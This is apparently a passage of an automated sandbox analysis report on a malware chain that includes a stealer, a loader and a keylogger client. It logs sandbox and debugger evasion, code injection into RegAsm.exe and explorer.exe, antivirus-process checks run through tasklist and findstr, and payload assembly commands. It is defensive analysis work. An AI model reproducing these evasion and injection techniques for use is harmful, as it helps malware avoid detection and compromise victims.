Source: PQ2AUndsdb.exe, 00000000.00000002.1298892938.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000005.00000002.1323730067.00000000007B3000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000011.00000002.2518786518.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.0000000000156000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000002.2257502711.000000000010E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2139418690.0000000000156000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2180595839.0000000000156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: XClient_protected.exe, 00000026.00000002.2542409818.000000001BB13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls@s{K
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000020.00000002.2539794352.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: RegAsm.exe, 00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp, wxfM3haI2K.exe, 0000001A.00000000.1924581251.0000000000E82000.00000002.00000001.01000000.0000000D.sdmp, wxfM3haI2K.exe.25.dr	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: explorer.exe, 00000020.00000000.1994978095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: explorer.exe, 00000020.00000002.2539794352.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: XBckuYbXje.exe, 0000001C.00000002.2122994534.000000000643B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,
Source: explorer.exe, 00000020.00000000.2007562137.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: explorer.exe, 00000020.00000002.2520566005.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000020.00000002.2539794352.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: Set-up.exe, 00000022.00000003.2195097920.0000000003199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: XBckuYbXje.exe, 0000001C.00000002.2099137805.0000000003D10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: explorer.exe, 00000020.00000000.1994978095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWD

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

Code function: 0_2_04BD06A0 rdtsc

0_2_04BD06A0

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

Code function: 30_2_00403252 LdrLoadDll,RtlZeroMemory,GetModuleHandleA,

30_2_00403252

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 25_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

25_2_00407AF1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005F645B mov eax, dword ptr fs:[00000030h]	17_2_005F645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005FA1C2 mov eax, dword ptr fs:[00000030h]	17_2_005FA1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0041913C mov eax, dword ptr fs:[00000030h]	25_2_0041913C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00411496 mov ecx, dword ptr fs:[00000030h]	25_2_00411496
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C2842 push dword ptr fs:[00000030h]	30_2_007C2842
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00880D90 mov eax, dword ptr fs:[00000030h]	30_2_00880D90
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_0088092B mov eax, dword ptr fs:[00000030h]	30_2_0088092B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 25_2_0041EFC8 GetProcessHeap,

25_2_0041EFC8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00407AF1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00407AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00407C53 SetUnhandledExceptionFilter,	25_2_00407C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_00407D65 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00407D65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_0040DD68 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_0040DD68

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: whicctb.32.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 46.100.50.5 80

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe, type: DROPPED

.NET source code references suspicious native API functions

Source: GOLD[1].exe.17.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect")
Source: GOLD[1].exe.17.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect")
Source: XClient_protected[1].exe.17.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: XClient_protected[1].exe.17.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: XClient_protected[1].exe.17.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe

Code function: 19_2_024D254D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

19_2_024D254D

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

Thread created: C:\Windows\explorer.exe EIP: 8871988

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A83008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11F8008	Jump to behavior

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\GOLD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user~1\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe "C:\Users\user~1\AppData\Local\Temp\1000005001\setup2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user~1\AppData\Local\Temp\1000129001\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe "C:\Users\user~1\AppData\Local\Temp\1000150001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe "C:\Users\user~1\AppData\Local\Temp\1000190001\XClient_protected.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe "C:\Users\user\AppData\Roaming\wxfM3haI2K.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\XBckuYbXje.exe "C:\Users\user\AppData\Roaming\XBckuYbXje.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 40365
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "HopeBuildersGeniusIslam" Sonic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000020.00000002.2532097657.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1997566863.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2007562137.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000002.2516624314.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.1995499829.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000020.00000002.2516624314.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.1995499829.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000020.00000000.1994978095.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2505660843.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
